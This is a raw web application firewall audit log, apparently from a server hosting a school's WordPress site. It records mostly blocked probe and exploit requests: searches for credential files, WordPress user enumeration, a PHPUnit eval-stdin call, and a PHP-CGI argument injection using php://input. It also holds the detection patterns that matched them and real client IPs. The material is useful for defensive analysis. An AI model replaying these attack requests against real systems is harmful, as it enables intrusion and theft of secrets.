l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea19f636-Z-- --23e6ea4a-A-- [09/May/2025:19:13:09 +0700] aB3xVVqQ1nOVx9fWpZSm1gAAABQ 103.236.140.4 53740 103.236.140.4 8181 --23e6ea4a-B-- GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3 --23e6ea4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23e6ea4a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792789680016 963 (- - -) Stopwatch2: 1746792789680016 963; combined=444, p1=402, p2=0, p3=0, p4=0, p5=42, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23e6ea4a-Z-- --92157b76-A-- [09/May/2025:19:13:13 +0700] aB3xWVqQ1nOVx9fWpZSm1wAAAAE 103.236.140.4 53744 103.236.140.4 8181 --92157b76-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; WebMoney Advisor) --92157b76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92157b76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746792793098973 682 (- - -) Stopwatch2: 1746792793098973 682; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92157b76-Z-- --c339b704-A-- [09/May/2025:19:51:49 +0700] aB36ZR6q_ZMebht3q14bcwAAAJA 103.236.140.4 54878 103.236.140.4 8181 --c339b704-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.227.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.227.246 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --c339b704-C-- --c339b704-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c339b704-E-- --c339b704-H-- Message: Access denied with code 403 (phase 2). String match " --0daaa73d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0daaa73d-E-- --0daaa73d-H-- Message: Access denied with code 403 (phase 2). String match " --3d03ba66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d03ba66-E-- --3d03ba66-H-- Message: Access denied with code 403 (phase 2). String match " --e23b4c44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e23b4c44-H-- Message: Access denied with code 403 (phase 2). String match " --3da0e22d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3da0e22d-E-- --3da0e22d-H-- Message: Access denied with code 403 (phase 2). String match " --40714e79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40714e79-E-- --40714e79-H-- Message: Access denied with code 403 (phase 2). 
String match " --d1f9a965-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1f9a965-H-- Message: Access denied with code 403 (phase 2). String match " --3a40ee3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a40ee3e-E-- --3a40ee3e-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --1883631e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1883631e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746798246017209 5451 (- - -) Stopwatch2: 1746798246017209 5451; combined=4162, p1=545, p2=3234, p3=22, p4=26, p5=180, sr=143, sw=155, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1883631e-Z-- --cb05fc6c-A-- [09/May/2025:20:49:21 +0700] aB4H4S-fAO47ojYKsMryJQAAAEE 103.236.140.4 55230 103.236.140.4 8181 --cb05fc6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.107.22.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.107.22.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb05fc6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb05fc6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746798561231195 3285 (- - -) Stopwatch2: 1746798561231195 3285; combined=1420, p1=472, p2=916, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb05fc6c-Z-- --fa4fd541-A-- [09/May/2025:20:52:57 +0700] aB4IuR6q_ZMebht3q14bjQAAAII 103.236.140.4 55258 103.236.140.4 8181 --fa4fd541-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 15.235.212.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 15.235.212.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fa4fd541-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa4fd541-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746798777476985 3571 (- - -) Stopwatch2: 1746798777476985 3571; combined=1599, p1=617, p2=951, p3=0, p4=0, p5=31, sr=187, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa4fd541-Z-- --e327250c-A-- [09/May/2025:20:54:02 +0700] aB4I-lqQ1nOVx9fWpZSoXAAAAAA 103.236.140.4 55264 103.236.140.4 8181 --e327250c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e327250c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e327250c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746798842879037 2862 (- - -) Stopwatch2: 1746798842879037 2862; combined=1275, p1=453, p2=791, p3=0, p4=0, p5=30, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e327250c-Z-- --d8bf7e3e-A-- [09/May/2025:20:54:07 +0700] aB4I_y-fAO47ojYKsMryKgAAAFg 103.236.140.4 55270 103.236.140.4 8181 --d8bf7e3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d8bf7e3e-C-- demo.sayHello --d8bf7e3e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8bf7e3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746798847619628 4881 (- - -) Stopwatch2: 1746798847619628 4881; combined=3708, p1=452, p2=3058, p3=22, p4=24, p5=90, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8bf7e3e-Z-- --521c4c41-A-- [09/May/2025:20:56:39 +0700] aB4Jlx6q_ZMebht3q14dgAAAAJE 103.236.140.4 58318 103.236.140.4 8181 --521c4c41-B-- GET /wp-config.php HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 213.209.143.92 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 213.209.143.92 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36 Accept: */* --521c4c41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --521c4c41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746798999994226 815 (- - -) Stopwatch2: 1746798999994226 815; combined=311, p1=273, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --521c4c41-Z-- --9cb11d1e-A-- [09/May/2025:21:06:45 +0700] aB4L9S-fAO47ojYKsMr14wAAAE4 103.236.140.4 40060 103.236.140.4 8181 --9cb11d1e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9cb11d1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cb11d1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746799605107459 2406 (- - -) Stopwatch2: 1746799605107459 2406; combined=1359, p1=422, p2=908, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb11d1e-Z-- --5884b54f-A-- [09/May/2025:21:06:53 +0700] aB4L_VoC-7ITMWTA_c9aWAAAANQ 103.236.140.4 40416 103.236.140.4 8181 --5884b54f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.154 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5884b54f-C-- demo.sayHello --5884b54f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5884b54f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746799613271506 5606 (- - -) Stopwatch2: 1746799613271506 5606; combined=4031, p1=551, p2=3277, p3=34, p4=37, p5=79, sr=66, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5884b54f-Z-- --04876c3a-A-- [09/May/2025:21:11:42 +0700] aB4NHh6q_ZMebht3q14jHgAAAJg 103.236.140.4 51128 103.236.140.4 8181 --04876c3a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04876c3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04876c3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746799902311170 2804 (- - -) Stopwatch2: 1746799902311170 2804; combined=1378, p1=476, p2=867, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04876c3a-Z-- --9294b622-A-- [09/May/2025:21:11:47 +0700] aB4NIx6q_ZMebht3q14jHwAAAIw 103.236.140.4 51132 103.236.140.4 8181 --9294b622-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9294b622-C-- demo.sayHello --9294b622-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9294b622-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746799907001158 6622 (- - -) Stopwatch2: 1746799907001158 6622; combined=5006, p1=675, p2=4098, p3=34, p4=32, p5=97, sr=114, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9294b622-Z-- --f970706f-A-- [09/May/2025:21:14:00 +0700] aB4NqFqQ1nOVx9fWpZSv-QAAABE 103.236.140.4 54394 103.236.140.4 8181 --f970706f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f970706f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f970706f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800040540903 3794 (- - -) Stopwatch2: 1746800040540903 3794; combined=1173, p1=381, p2=756, p3=0, p4=0, p5=35, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f970706f-Z-- --16e78c3d-A-- [09/May/2025:21:14:06 +0700] aB4NrlqQ1nOVx9fWpZSv_AAAAAQ 103.236.140.4 54402 103.236.140.4 8181 --16e78c3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.131 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --16e78c3d-C-- demo.sayHello --16e78c3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --16e78c3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746800046687132 5065 (- - -) Stopwatch2: 1746800046687132 5065; combined=3839, p1=499, p2=3138, p3=23, p4=26, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16e78c3d-Z-- --000b222d-A-- [09/May/2025:21:14:31 +0700] aB4Nxx6q_ZMebht3q14jgQAAAIk 103.236.140.4 54420 103.236.140.4 8181 --000b222d-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.39.93.93 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.39.93.93 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --000b222d-C-- --000b222d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --000b222d-E-- --000b222d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800071002593 8786 (- - -) Stopwatch2: 1746800071002593 8786; combined=7062, p1=532, p2=6493, p3=0, p4=0, p5=37, sr=118, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --000b222d-Z-- --618eac73-A-- [09/May/2025:21:17:22 +0700] aB4OclqQ1nOVx9fWpZSwBwAAAA4 103.236.140.4 54512 103.236.140.4 8181 --618eac73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --618eac73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --618eac73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746800242622696 2911 (- - -) Stopwatch2: 1746800242622696 2911; combined=1315, p1=461, p2=824, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
